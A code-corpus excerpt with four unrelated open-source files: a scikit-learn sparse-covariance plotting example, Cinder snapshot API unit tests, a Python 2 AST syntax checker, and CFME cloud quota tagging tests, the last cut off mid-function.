examples/covariance/plot_sparse_cov.py
|
300
|
5078
|
"""
======================================
Sparse inverse covariance estimation
======================================
Using the GraphLasso estimator to learn a covariance and sparse precision
from a small number of samples.
To estimate a probabilistic model (e.g. a Gaussian model), estimating the
precision matrix, that is the inverse covariance matrix, is as important
as estimating the covariance matrix. Indeed a Gaussian model is
parametrized by the precision matrix.
To be in favorable recovery conditions, we sample the data from a model
with a sparse inverse covariance matrix. In addition, we ensure that the
data is not too much correlated (limiting the largest coefficient of the
precision matrix) and that there a no small coefficients in the
precision matrix that cannot be recovered. In addition, with a small
number of observations, it is easier to recover a correlation matrix
rather than a covariance, thus we scale the time series.
Here, the number of samples is slightly larger than the number of
dimensions, thus the empirical covariance is still invertible. However,
as the observations are strongly correlated, the empirical covariance
matrix is ill-conditioned and as a result its inverse --the empirical
precision matrix-- is very far from the ground truth.
If we use l2 shrinkage, as with the Ledoit-Wolf estimator, as the number
of samples is small, we need to shrink a lot. As a result, the
Ledoit-Wolf precision is fairly close to the ground truth precision, that
is not far from being diagonal, but the off-diagonal structure is lost.
The l1-penalized estimator can recover part of this off-diagonal
structure. It learns a sparse precision. It is not able to
recover the exact sparsity pattern: it detects too many non-zero
coefficients. However, the highest non-zero coefficients of the l1
estimated correspond to the non-zero coefficients in the ground truth.
Finally, the coefficients of the l1 precision estimate are biased toward
zero: because of the penalty, they are all smaller than the corresponding
ground truth value, as can be seen on the figure.
Note that, the color range of the precision matrices is tweaked to
improve readability of the figure. The full range of values of the
empirical precision is not displayed.
The alpha parameter of the GraphLasso setting the sparsity of the model is
set by internal cross-validation in the GraphLassoCV. As can be
seen on figure 2, the grid to compute the cross-validation score is
iteratively refined in the neighborhood of the maximum.
"""
print(__doc__)
# author: Gael Varoquaux <gael.varoquaux@inria.fr>
# License: BSD 3 clause
# Copyright: INRIA
import numpy as np
from scipy import linalg
from sklearn.datasets import make_sparse_spd_matrix
from sklearn.covariance import GraphLassoCV, ledoit_wolf
import matplotlib.pyplot as plt
##############################################################################
# Generate the data
n_samples = 60
n_features = 20
prng = np.random.RandomState(1)
prec = make_sparse_spd_matrix(n_features, alpha=.98,
smallest_coef=.4,
largest_coef=.7,
random_state=prng)
cov = linalg.inv(prec)
d = np.sqrt(np.diag(cov))
cov /= d
cov /= d[:, np.newaxis]
prec *= d
prec *= d[:, np.newaxis]
X = prng.multivariate_normal(np.zeros(n_features), cov, size=n_samples)
X -= X.mean(axis=0)
X /= X.std(axis=0)
##############################################################################
# Estimate the covariance
emp_cov = np.dot(X.T, X) / n_samples
model = GraphLassoCV()
model.fit(X)
cov_ = model.covariance_
prec_ = model.precision_
lw_cov_, _ = ledoit_wolf(X)
lw_prec_ = linalg.inv(lw_cov_)
##############################################################################
# Plot the results
plt.figure(figsize=(10, 6))
plt.subplots_adjust(left=0.02, right=0.98)
# plot the covariances
covs = [('Empirical', emp_cov), ('Ledoit-Wolf', lw_cov_),
('GraphLasso', cov_), ('True', cov)]
vmax = cov_.max()
for i, (name, this_cov) in enumerate(covs):
plt.subplot(2, 4, i + 1)
plt.imshow(this_cov, interpolation='nearest', vmin=-vmax, vmax=vmax,
cmap=plt.cm.RdBu_r)
plt.xticks(())
plt.yticks(())
plt.title('%s covariance' % name)
# plot the precisions
precs = [('Empirical', linalg.inv(emp_cov)), ('Ledoit-Wolf', lw_prec_),
('GraphLasso', prec_), ('True', prec)]
vmax = .9 * prec_.max()
for i, (name, this_prec) in enumerate(precs):
ax = plt.subplot(2, 4, i + 5)
plt.imshow(np.ma.masked_equal(this_prec, 0),
interpolation='nearest', vmin=-vmax, vmax=vmax,
cmap=plt.cm.RdBu_r)
plt.xticks(())
plt.yticks(())
plt.title('%s precision' % name)
ax.set_axis_bgcolor('.7')
# plot the model selection metric
plt.figure(figsize=(4, 3))
plt.axes([.2, .15, .75, .7])
plt.plot(model.cv_alphas_, np.mean(model.grid_scores, axis=1), 'o-')
plt.axvline(model.alpha_, color='.5')
plt.title('Model selection')
plt.ylabel('Cross-validation score')
plt.xlabel('alpha')
plt.show()
|
bsd-3-clause
|
sasukeh/cinder
|
cinder/tests/unit/api/v2/test_snapshots.py
|
10
|
24185
|
# Copyright 2011 Denali Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from six.moves.urllib import parse as urllib
import webob
from cinder.api import common
from cinder.api.v2 import snapshots
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit.api.v2 import stubs
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit import fake_volume
from cinder.tests.unit import utils
from cinder import volume
CONF = cfg.CONF
UUID = '00000000-0000-0000-0000-000000000001'
INVALID_UUID = '00000000-0000-0000-0000-000000000002'
def _get_default_snapshot_param():
return {
'id': UUID,
'volume_id': 12,
'status': 'available',
'volume_size': 100,
'created_at': None,
'user_id': 'bcb7746c7a41472d88a1ffac89ba6a9b',
'project_id': '7ffe17a15c724e2aa79fc839540aec15',
'display_name': 'Default name',
'display_description': 'Default description',
'deleted': None,
'volume': {'availability_zone': 'test_zone'}
}
def stub_snapshot_delete(self, context, snapshot):
if snapshot['id'] != UUID:
raise exception.SnapshotNotFound(snapshot['id'])
def stub_snapshot_get(self, context, snapshot_id):
if snapshot_id != UUID:
raise exception.SnapshotNotFound(snapshot_id)
param = _get_default_snapshot_param()
return param
def stub_snapshot_get_all(self, context, search_opts=None):
param = _get_default_snapshot_param()
return [param]
class SnapshotApiTest(test.TestCase):
def setUp(self):
super(SnapshotApiTest, self).setUp()
self.controller = snapshots.SnapshotsController()
self.stubs.Set(db, 'snapshot_get_all_by_project',
stubs.stub_snapshot_get_all_by_project)
self.stubs.Set(db, 'snapshot_get_all',
stubs.stub_snapshot_get_all)
self.ctx = context.RequestContext('admin', 'fakeproject', True)
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_snapshot_create(self, mock_validate):
volume = utils.create_volume(self.ctx)
snapshot_name = 'Snapshot Test Name'
snapshot_description = 'Snapshot Test Desc'
snapshot = {
"volume_id": volume.id,
"force": False,
"name": snapshot_name,
"description": snapshot_description
}
body = dict(snapshot=snapshot)
req = fakes.HTTPRequest.blank('/v2/snapshots')
resp_dict = self.controller.create(req, body)
self.assertIn('snapshot', resp_dict)
self.assertEqual(snapshot_name, resp_dict['snapshot']['name'])
self.assertEqual(snapshot_description,
resp_dict['snapshot']['description'])
self.assertTrue(mock_validate.called)
db.volume_destroy(self.ctx, volume.id)
def test_snapshot_create_force(self):
volume = utils.create_volume(self.ctx, status='in-use')
snapshot_name = 'Snapshot Test Name'
snapshot_description = 'Snapshot Test Desc'
snapshot = {
"volume_id": volume.id,
"force": True,
"name": snapshot_name,
"description": snapshot_description
}
body = dict(snapshot=snapshot)
req = fakes.HTTPRequest.blank('/v2/snapshots')
resp_dict = self.controller.create(req, body)
self.assertIn('snapshot', resp_dict)
self.assertEqual(snapshot_name,
resp_dict['snapshot']['name'])
self.assertEqual(snapshot_description,
resp_dict['snapshot']['description'])
snapshot = {
"volume_id": volume.id,
"force": "**&&^^%%$$##@@",
"name": "Snapshot Test Name",
"description": "Snapshot Test Desc"
}
body = dict(snapshot=snapshot)
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.assertRaises(exception.InvalidParameterValue,
self.controller.create,
req,
body)
db.volume_destroy(self.ctx, volume.id)
def test_snapshot_create_without_volume_id(self):
snapshot_name = 'Snapshot Test Name'
snapshot_description = 'Snapshot Test Desc'
body = {
"snapshot": {
"force": True,
"name": snapshot_name,
"description": snapshot_description
}
}
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, body)
@mock.patch.object(volume.api.API, "update_snapshot",
side_effect=stubs.stub_snapshot_update)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_snapshot_update(
self, mock_validate, snapshot_get_by_id, volume_get_by_id,
snapshot_metadata_get, update_snapshot):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata'],
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
updates = {
"name": "Updated Test Name",
}
body = {"snapshot": updates}
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
res_dict = self.controller.update(req, UUID, body)
expected = {
'snapshot': {
'id': UUID,
'volume_id': '1',
'status': u'available',
'size': 100,
'created_at': None,
'name': u'Updated Test Name',
'description': u'Default description',
'metadata': {},
}
}
self.assertEqual(expected, res_dict)
self.assertTrue(mock_validate.called)
self.assertEqual(2, len(self.notifier.notifications))
def test_snapshot_update_missing_body(self):
body = {}
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, UUID, body)
def test_snapshot_update_invalid_body(self):
body = {'name': 'missing top level snapshot key'}
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, UUID, body)
def test_snapshot_update_not_found(self):
self.stubs.Set(volume.api.API, "get_snapshot", stub_snapshot_get)
updates = {
"name": "Updated Test Name",
}
body = {"snapshot": updates}
req = fakes.HTTPRequest.blank('/v2/snapshots/not-the-uuid')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update, req,
'not-the-uuid', body)
@mock.patch.object(volume.api.API, "delete_snapshot",
side_effect=stubs.stub_snapshot_update)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_snapshot_delete(self, snapshot_get_by_id, volume_get_by_id,
snapshot_metadata_get, delete_snapshot):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata'],
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
snapshot_id = UUID
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % snapshot_id)
resp = self.controller.delete(req, snapshot_id)
self.assertEqual(202, resp.status_int)
def test_snapshot_delete_invalid_id(self):
self.stubs.Set(volume.api.API, "delete_snapshot", stub_snapshot_delete)
snapshot_id = INVALID_UUID
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % snapshot_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, snapshot_id)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_snapshot_show(self, snapshot_get_by_id, volume_get_by_id,
snapshot_metadata_get):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata'],
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
resp_dict = self.controller.show(req, UUID)
self.assertIn('snapshot', resp_dict)
self.assertEqual(UUID, resp_dict['snapshot']['id'])
def test_snapshot_show_invalid_id(self):
snapshot_id = INVALID_UUID
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % snapshot_id)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, snapshot_id)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
@mock.patch('cinder.volume.api.API.get_all_snapshots')
def test_snapshot_detail(self, get_all_snapshots, snapshot_get_by_id,
volume_get_by_id, snapshot_metadata_get):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
snapshots = objects.SnapshotList(objects=[snapshot_obj])
get_all_snapshots.return_value = snapshots
req = fakes.HTTPRequest.blank('/v2/snapshots/detail')
resp_dict = self.controller.detail(req)
self.assertIn('snapshots', resp_dict)
resp_snapshots = resp_dict['snapshots']
self.assertEqual(1, len(resp_snapshots))
resp_snapshot = resp_snapshots.pop()
self.assertEqual(UUID, resp_snapshot['id'])
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_admin_list_snapshots_limited_to_project(self,
snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_list_snapshots_with_limit_and_offset(self,
snapshot_metadata_get):
def list_snapshots_with_limit_and_offset(snaps, is_admin):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots?limit=1\
&offset=1',
use_admin_context=is_admin)
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
self.assertEqual(snaps[1].id, res['snapshots'][0]['id'])
# Test that we get an empty list with an offset greater than the
# number of items
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=1&offset=3')
self.assertEqual({'snapshots': []}, self.controller.index(req))
self.stubs.UnsetAll()
volume, snaps = self._create_db_snapshots(3)
# admin case
list_snapshots_with_limit_and_offset(snaps, is_admin=True)
# non-admin case
list_snapshots_with_limit_and_offset(snaps, is_admin=False)
@mock.patch.object(db, 'snapshot_get_all_by_project')
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_list_snpashots_with_wrong_limit_and_offset(self,
mock_metadata_get,
mock_snapshot_get_all):
"""Test list with negative and non numeric limit and offset."""
mock_snapshot_get_all.return_value = []
# Negative limit
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=-1&offset=1')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
# Non numeric limit
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=a&offset=1')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
# Negative offset
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=1&offset=-1')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
# Non numeric offset
req = fakes.HTTPRequest.blank('/v2/snapshots?limit=1&offset=a')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index,
req)
def _assert_list_next(self, expected_query=None, project='fakeproject',
**kwargs):
"""Check a page of snapshots list."""
# Since we are accessing v2 api directly we don't need to specify
# v2 in the request path, if we did, we'd get /v2/v2 links back
request_path = '/%s/snapshots' % project
expected_path = '/v2' + request_path
# Construct the query if there are kwargs
if kwargs:
request_str = request_path + '?' + urllib.urlencode(kwargs)
else:
request_str = request_path
# Make the request
req = fakes.HTTPRequest.blank(request_str)
res = self.controller.index(req)
# We only expect to have a next link if there is an actual expected
# query.
if expected_query:
# We must have the links
self.assertIn('snapshots_links', res)
links = res['snapshots_links']
# Must be a list of links, even if we only get 1 back
self.assertTrue(list, type(links))
next_link = links[0]
# rel entry must be next
self.assertIn('rel', next_link)
self.assertIn('next', next_link['rel'])
# href entry must have the right path
self.assertIn('href', next_link)
href_parts = urllib.urlparse(next_link['href'])
self.assertEqual(expected_path, href_parts.path)
# And the query from the next link must match what we were
# expecting
params = urllib.parse_qs(href_parts.query)
self.assertDictEqual(expected_query, params)
# Make sure we don't have links if we were not expecting them
else:
self.assertNotIn('snapshots_links', res)
def _create_db_snapshots(self, num_snaps):
volume = utils.create_volume(self.ctx)
snaps = [utils.create_snapshot(self.ctx,
volume.id,
display_name='snap' + str(i))
for i in range(num_snaps)]
self.addCleanup(db.volume_destroy, self.ctx, volume.id)
for snap in snaps:
self.addCleanup(db.snapshot_destroy, self.ctx, snap.id)
snaps.reverse()
return volume, snaps
def test_list_snapshots_next_link_default_limit(self):
"""Test that snapshot list pagination is limited by osapi_max_limit."""
self.stubs.UnsetAll()
volume, snaps = self._create_db_snapshots(3)
# NOTE(geguileo): Since cinder.api.common.limited has already been
# imported his argument max_limit already has a default value of 1000
# so it doesn't matter that we change it to 2. That's why we need to
# mock it and send it current value. We still need to set the default
# value because other sections of the code use it, for example
# _get_collection_links
CONF.set_default('osapi_max_limit', 2)
def get_pagination_params(params, max_limit=CONF.osapi_max_limit,
original_call=common.get_pagination_params):
return original_call(params, max_limit)
def _get_limit_param(params, max_limit=CONF.osapi_max_limit,
original_call=common._get_limit_param):
return original_call(params, max_limit)
with mock.patch.object(common, 'get_pagination_params',
get_pagination_params), \
mock.patch.object(common, '_get_limit_param',
_get_limit_param):
# The link from the first page should link to the second
self._assert_list_next({'marker': [snaps[1].id]})
# Second page should have no next link
self._assert_list_next(marker=snaps[1].id)
def test_list_snapshots_next_link_with_limit(self):
"""Test snapshot list pagination with specific limit."""
self.stubs.UnsetAll()
volume, snaps = self._create_db_snapshots(2)
# The link from the first page should link to the second
self._assert_list_next({'limit': ['1'], 'marker': [snaps[0].id]},
limit=1)
# Even though there are no more elements, we should get a next element
# per specification.
expected = {'limit': ['1'], 'marker': [snaps[1].id]}
self._assert_list_next(expected, limit=1, marker=snaps[0].id)
# When we go beyond the number of elements there should be no more
# next links
self._assert_list_next(limit=1, marker=snaps[1].id)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_admin_list_snapshots_all_tenants(self, snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots?all_tenants=1',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(3, len(res['snapshots']))
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_all_tenants_non_admin_gets_all_tenants(self,
snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots?all_tenants=1')
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
def test_non_admin_get_by_project(self, snapshot_metadata_get):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots')
res = self.controller.index(req)
self.assertIn('snapshots', res)
self.assertEqual(1, len(res['snapshots']))
def _create_snapshot_bad_body(self, body):
req = fakes.HTTPRequest.blank('/v2/fake/snapshots')
req.method = 'POST'
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, body)
def test_create_no_body(self):
self._create_snapshot_bad_body(body=None)
def test_create_missing_snapshot(self):
body = {'foo': {'a': 'b'}}
self._create_snapshot_bad_body(body=body)
def test_create_malformed_entity(self):
body = {'snapshot': 'string'}
self._create_snapshot_bad_body(body=body)
class SnapshotSerializerTest(test.TestCase):
def _verify_snapshot(self, snap, tree):
self.assertEqual('snapshot', tree.tag)
for attr in ('id', 'status', 'size', 'created_at',
'name', 'description', 'volume_id'):
self.assertEqual(str(snap[attr]), tree.get(attr))
def test_snapshot_show_create_serializer(self):
serializer = snapshots.SnapshotTemplate()
raw_snapshot = dict(
id='snap_id',
status='snap_status',
size=1024,
created_at=timeutils.utcnow(),
name='snap_name',
description='snap_desc',
display_description='snap_desc',
volume_id='vol_id',
)
text = serializer.serialize(dict(snapshot=raw_snapshot))
tree = etree.fromstring(text)
self._verify_snapshot(raw_snapshot, tree)
def test_snapshot_index_detail_serializer(self):
serializer = snapshots.SnapshotsTemplate()
raw_snapshots = [
dict(
id='snap1_id',
status='snap1_status',
size=1024,
created_at=timeutils.utcnow(),
name='snap1_name',
description='snap1_desc',
volume_id='vol1_id',
),
dict(
id='snap2_id',
status='snap2_status',
size=1024,
created_at=timeutils.utcnow(),
name='snap2_name',
description='snap2_desc',
volume_id='vol2_id',
)
]
text = serializer.serialize(dict(snapshots=raw_snapshots))
tree = etree.fromstring(text)
self.assertEqual('snapshots', tree.tag)
self.assertEqual(len(raw_snapshots), len(tree))
for idx, child in enumerate(tree):
self._verify_snapshot(raw_snapshots[idx], child)
|
apache-2.0
|
emilk/sproxel
|
distro/common/lib/compiler/syntax.py
|
25
|
1490
|
"""Check for errs in the AST.
The Python parser does not catch all syntax errors. Others, like
assignments with invalid targets, are caught in the code generation
phase.
The compiler package catches some errors in the transformer module.
But it seems clearer to write checkers that use the AST to detect
errors.
"""
from compiler import ast, walk
def check(tree, multi=None):
v = SyntaxErrorChecker(multi)
walk(tree, v)
return v.errors
class SyntaxErrorChecker:
"""A visitor to find syntax errors in the AST."""
def __init__(self, multi=None):
"""Create new visitor object.
If optional argument multi is not None, then print messages
for each error rather than raising a SyntaxError for the
first.
"""
self.multi = multi
self.errors = 0
def error(self, node, msg):
self.errors = self.errors + 1
if self.multi is not None:
print "%s:%s: %s" % (node.filename, node.lineno, msg)
else:
raise SyntaxError, "%s (%s:%s)" % (msg, node.filename, node.lineno)
def visitAssign(self, node):
# the transformer module handles many of these
pass
## for target in node.nodes:
## if isinstance(target, ast.AssList):
## if target.lineno is None:
## target.lineno = node.lineno
## self.error(target, "can't assign to list comprehension")
|
bsd-3-clause
|
apagac/cfme_tests
|
cfme/tests/cloud/test_quota_tagging.py
|
3
|
10773
|
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
from riggerlib import recursive_update
from widgetastic.utils import partial_match
from cfme import test_requirements
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.services.service_catalogs import ServiceCatalogs
from cfme.utils.appliance import ViaSSUI
from cfme.utils.appliance import ViaUI
from cfme.utils.generators import random_vm_name
from cfme.utils.update import update
pytestmark = [
test_requirements.quota,
pytest.mark.usefixtures('setup_provider'),
pytest.mark.provider([OpenStackProvider],
required_fields=[['provisioning', 'image']], scope="module")
]
@pytest.fixture
def admin_email(appliance):
"""Required for user quota tagging services to work, as it's mandatory for it's functioning."""
user = appliance.collections.users
admin = user.instantiate(name='Administrator')
with update(admin):
admin.email = fauxfactory.gen_email()
yield
with update(admin):
admin.email = ''
@pytest.fixture
def vm_name():
return random_vm_name(context='quota')
@pytest.fixture
def template_name(provisioning):
return provisioning["image"]["name"]
@pytest.fixture
def prov_data(provider, vm_name, template_name):
if provider.one_of(OpenStackProvider):
return {
"catalog": {'vm_name': vm_name, 'catalog_name': {'name': template_name}},
"environment": {'automatic_placement': True},
"properties": {'instance_type': partial_match('m1.large')}
}
@pytest.fixture(scope='module')
def domain(appliance):
domain = appliance.collections.domains.create('test_{}'.format(fauxfactory.gen_alphanumeric()),
'description_{}'.format(
fauxfactory.gen_alphanumeric()),
enabled=True)
yield domain
if domain.exists:
domain.delete()
@pytest.fixture
def catalog_item(appliance, provider, dialog, catalog, prov_data):
collection = appliance.collections.catalog_items
catalog_item = collection.create(
provider.catalog_item_type,
name='test_{}'.format(fauxfactory.gen_alphanumeric()),
description='test catalog',
display_in=True,
catalog=catalog,
dialog=dialog,
prov_data=prov_data)
yield catalog_item
if catalog_item.exists:
catalog_item.delete()
@pytest.fixture(scope='module')
def max_quota_test_instance(appliance, domain):
miq = appliance.collections.domains.instantiate('ManageIQ')
original_instance = (
miq.namespaces.instantiate('System')
.namespaces.instantiate('CommonMethods')
.classes.instantiate('QuotaMethods')
.instances.instantiate('quota_source')
)
original_instance.copy_to(domain=domain)
original_instance = (
miq.namespaces.instantiate('System')
.namespaces.instantiate('CommonMethods')
.classes.instantiate('QuotaStateMachine')
.instances.instantiate('quota')
)
original_instance.copy_to(domain=domain)
instance = (
domain.namespaces.instantiate('System')
.namespaces.instantiate('CommonMethods')
.classes.instantiate('QuotaStateMachine')
.instances.instantiate('quota')
)
return instance
def set_entity_quota_source(max_quota_test_instance, entity):
with update(max_quota_test_instance):
max_quota_test_instance.fields = {'quota_source_type': {'value': entity}}
@pytest.fixture(params=['user', 'group'])
def set_entity_quota_source_change(max_quota_test_instance, request):
entity_value = request.param
with update(max_quota_test_instance):
max_quota_test_instance.fields = {'quota_source_type': {'value': entity_value}}
@pytest.fixture(params=[('groups', 'group', 'EvmGroup-super_administrator'),
('users', 'user', 'Administrator')], ids=['group', 'user'], scope='module')
def entities(appliance, request, max_quota_test_instance):
collection, entity, description = request.param
set_entity_quota_source(max_quota_test_instance, entity)
return getattr(appliance.collections, collection).instantiate(description)
@pytest.fixture(scope='function')
def set_entity_quota_tag(request, entities, appliance):
tag, value = request.param
tag = appliance.collections.categories.instantiate(
display_name=tag).collections.tags.instantiate(
display_name=value)
entities.add_tag(tag)
yield
# will refresh page as navigation to configuration is blocked if alert are on requests page
appliance.server.browser.refresh()
entities.remove_tag(tag)
@pytest.mark.parametrize(
['set_entity_quota_tag'],
[
[('Quota - Max Memory *', '1GB')],
[('Quota - Max Storage *', '10GB')],
[('Quota - Max CPUs *', '1')]
],
indirect=['set_entity_quota_tag'],
ids=['max_memory', 'max_storage', 'max_cpu']
)
def test_quota_tagging_cloud_via_lifecycle(request, appliance, provider, prov_data,
set_entity_quota_tag, template_name, vm_name):
"""Test Group and User Quota in UI using tagging
Polarion:
assignee: ghubale
casecomponent: Cloud
initialEstimate: 1/6h
tags: quota
"""
recursive_update(prov_data, {
'request': {'email': 'test_{}@example.com'.format(fauxfactory.gen_alphanumeric())}})
prov_data.update({'template_name': template_name})
appliance.collections.cloud_instances.create(vm_name, provider, prov_data, override=True)
# nav to requests page to check quota validation
request_description = 'Provision from [{template}] to [{vm}]'.format(template=template_name,
vm=vm_name)
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
@pytest.mark.parametrize('context', [ViaSSUI, ViaUI])
@pytest.mark.parametrize(
['set_entity_quota_tag'],
[
[('Quota - Max Memory *', '1GB')],
[('Quota - Max Storage *', '10GB')],
[('Quota - Max CPUs *', '1')]
],
indirect=['set_entity_quota_tag'],
ids=['max_memory', 'max_storage', 'max_cpu']
)
def test_quota_tagging_cloud_via_services(appliance, request, context, admin_email,
set_entity_quota_tag, catalog_item):
"""Test Group and User Quota in UI and SSUI using tagging
Polarion:
assignee: ghubale
casecomponent: Cloud
initialEstimate: 1/6h
tags: quota
"""
with appliance.context.use(context):
service_catalogs = ServiceCatalogs(appliance, catalog_item.catalog, catalog_item.name)
if context is ViaSSUI:
service_catalogs.add_to_shopping_cart()
service_catalogs.order()
# nav to requests page to check quota validation
request_description = 'Provisioning Service [{0}] from [{0}]'.format(catalog_item.name)
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
def test_cloud_quota_by_lifecycle(request, appliance, provider, set_entity_quota_source_change,
prov_data, vm_name, template_name):
"""Testing cloud quota for user and group by provisioning instance via lifecycle
Polarion:
assignee: ghubale
initialEstimate: 1/4h
casecomponent: Cloud
tags: quota
testSteps:
1. Navigate to Automation > automate > Explorer
2. Create new Domain and copy 'quota' and 'quota_source' method
3. Change 'value' of 'open source type' to 'user' or 'group' (one by one) in 'quota'
method
4. Provision instance via lifecycle
5. Make sure that provisioned 'template' is having more than assigned quota
6. Check whether instance provision 'Denied' with reason 'Quota Exceeded'
"""
recursive_update(prov_data, {
'request': {'email': 'test_{}@example.com'.format(fauxfactory.gen_alphanumeric())}})
prov_data.update({'template_name': template_name})
appliance.collections.cloud_instances.create(vm_name, provider, prov_data, override=True)
# nav to requests page to check quota validation
request_description = 'Provision from [{template}] to [{vm}]'.format(template=template_name,
vm=vm_name)
provision_request = appliance.collections.requests.instantiate(request_description)
provision_request.wait_for_request(method='ui')
request.addfinalizer(provision_request.remove_request)
assert provision_request.row.reason.text == "Quota Exceeded"
@pytest.mark.parametrize('context', [ViaSSUI, ViaUI])
def test_quota_cloud_via_services(appliance, request, admin_email, entities, prov_data,
catalog_item, context):
"""This test case verifies the quota assigned by automation method for user and group
is working correctly for the cloud providers.
Polarion:
assignee: ghubale
initialEstimate: 1/4h
casecomponent: Cloud
tags: quota
testSteps:
1. Navigate to Automation > Automate > Explorer
2. Add quota automation methods to domain
3. Change 'quota_source_type' to 'user' or 'group'
4. Test quota by provisioning instances over quota limit via UI or
SSUI for user and group
5. Check whether quota is exceeded or not
"""
with appliance.context.use(context):
service_catalogs = ServiceCatalogs(appliance, catalog_item.catalog, catalog_item.name)
if context is ViaSSUI:
service_catalogs.add_to_shopping_cart()
service_catalogs.order()
